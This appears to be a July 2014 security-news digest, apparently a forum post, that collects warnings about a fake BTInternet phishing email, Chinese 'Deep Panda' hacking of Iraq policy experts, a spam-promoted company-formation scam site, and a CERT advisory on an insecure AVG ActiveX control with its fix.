Fake BTinternet email - Phish
FYI...
Fake BTinternet email - Phish ...
- http://www.hoax-slayer.com/expiratio...phishing.shtml
Last updated: July 8, 2014 - "Message purporting to be from BTInternet claims that you must update all of your 'informations' via an attached form or risk the 'expiration' of your BTInternet email. The message is -not- from BT. It is a phishing scam designed to steal personal and financial information from BT customers.
Screenshot: http://www.hoax-slayer.com/images/ex...ishing-pin.jpg
According to this email, which claims to be from BTInternet, you are required to update all of your account information by filling in a form contained in an attached file. The message warns that your account will be disabled if you do not update your details as instructed... the email is -not- from BT and the claim that you must update details or risk account 'expiration' is a lie.
In fact, the email is a typical phishing scam and is designed to steal your personal and financial data. The attached file contains a form that asks for a large amount of information, including your account login details, your name and contact data, and your credit card and bank account numbers. Opening the attachment loads the form in your web browser. Clicking the 'Submit' button on the -bogus- form sends all of the information to criminals who can then use it to commit financial fraud and identity theft... Any email that asks you to open an attached file or click a link to supply personal and financial information should be treated as suspicious..."
- https://en.wikipedia.org/wiki/BT_Group
___
Chinese hacks turned focus to U.S. experts on Iraq
- http://www.reuters.com/article/2014/...0FC2E620140708
Jul 8, 2014 - "A sophisticated group of hackers believed to be associated with the Chinese government, who for years targeted U.S experts on Asian geopolitical matters, suddenly began breaching computers belonging to experts on Iraq as the rebellion there escalated, a security firm said on Monday. CrowdStrike Inc said* that the group is one of the most sophisticated of the 30 it tracks in China and that its operations are better hidden than many attributed to military and other government units... China's Foreign Ministry repeated that the government opposed hacking and dismissed the report... Over the past three years, CrowdStrike said it has seen the group it calls "Deep Panda" target defense, financial and other industries in the United States. It has also gone after workers at think tanks who specialize in Southeast Asian affairs, including former government experts..."
* http://www.crowdstrike.com/blog/deep...nks/index.html
Jul 7, 2014
- http://atlas.arbor.net/briefs/index#-308984771
July 10, 2014
A Chinese nation-state threat group called "Deep Panda" has been targeting national security think tanks, particularly individuals with ties to Iraq/Middle East policy issues.
Analysis: The focus on these individuals began the same day as an ISIS-led attack on an oil refinery in Iraq, which provides a large amount of oil to China. [ http://www.crowdstrike.com/blog/deep...nks/index.html ] Advanced threat actors frequently target individuals who may have access to sensitive information, demonstrated recently again when hackers believed to be Chinese accessed some databases of the Office of Personnel Maintenance, which conducts background reviews for security clearances. [ http://www.nytimes.com/2014/07/10/wo...s-workers.html ] Many individuals are also targeted using information available via public sources such as social media. This information could then be used to conduct social engineering attacks to deliver malware, steal credentials, etc.
___
SCAM: "All Company Formation" (allcompanyformation .com / businessformation247 .com)
- http://blog.dynamoo.com/2014/07/scam...formation.html
8 July 2014 - "Sometimes it isn't easy to see what a -scam- is, but this email hit my -spamtrap- advertising an outfit that can allegedly create offshore companies and acquire all sorts of trading licences and things like SSL certificates.
From: All Company Formation [info@ allcompanyformation .com]
Date: 7 July 2014 12:58
Subject: [Info] Worldwide Company Formation Services - EV SSL Approval Services
We have a team of agents in different countries we are providing Company Registration services...
For order and need more informations kindly contact us : www .allcompanyformation .com
Email: info@ allcompanyformation .com
skype : companiesformations
The spam originates from 209.208.109.225 which belongs to Internet Connect Company in Orlando, Florida.. Orlando being a hotbed of fraud which would make it ideal for twinning with Lagos. The spam then bounces through a WebSiteWelcome IP of 192.185.82.77. None of those IP's give a clue as the the real ownership of the site. The -spamvertised- site of allcompanyformation .com (also mirrored at businessformation247 .com) looks generic but professional:
> https://3.bp.blogspot.com/-gHGjWYiHx...foundation.png
It is plastered with logos from legitimate organisations, presumably to give it an air of respectability:
> https://2.bp.blogspot.com/-l9ILGO4rF...formation3.png
You can pay for these "services" using any one of a number of obscure payment methods:
> https://2.bp.blogspot.com/-Gy9kjBDZe...formation4.png
... The contact information seems deliberately vague and there are no physical contact addresses or company registration details anywhere on the website:
> https://3.bp.blogspot.com/-N7_7ubPgu...formation5.png
The telephone number looks like a US one, but on closer examination appears to be a Bandwidth.com VOIP forwarder to another number (which could be anywhere in the world). These 315-944 numbers seem to be often abused by scammers. The WHOIS details are anonymous, and the website has been carefully excised of any identifying information. Most of the text (and indeed the whole concept) has been copy-and-pasted from Slogold.net who seem to be a real company with real contact details. They even go so far as to warn people of various scams using the Slogold name. The following factors indicate that this is a scam, and sending them money would be a hugely bad idea:
- The site is promoted through spam (this sample was sent to a spamtrap)
- The domain allcompanyformation .com has anonymous registration details and was created only in December 2013.
- There are no real contact details anywhere on the site.
- The text is copy and pasted (i.e. stolen) from other sites, primarily Slogold .net.
-Avoid- "
___
AVG Safeguard and Secure Search ActiveX control provides insecure methods
- http://www.kb.cert.org/vuls/id/960193
Last revised: 07 Jul 2014 - "... By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to download and execute arbitrary code with the privileges of the logged-on user.
Solution: Apply an update: This issue is addressed in AVG Secure Search -toolbar- version 18.1.7.598 and AVG Safeguard 18.1.7.644. While these versions are still marked as Safe for Scripting, this version of the control has restrictions in place that prevent its use by web pages hosted by domains other than .avg .com or .avg.nation .com. Please also consider the following workaround:
Disable the AVG ScriptHelper ActiveX control in Internet Explorer:
The vulnerable AVG ScriptHelper ActiveX control can be -disabled- in Internet Explorer by setting the kill bit..."
(More detail at the cert URL above.)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-2956 - 9.3 (HIGH)
> http://www.avg.com/us-en/secure-search
"... connection times out
> http://inst.avg.com/serve/dl.php?pid...b0:productpage
"... connection times out
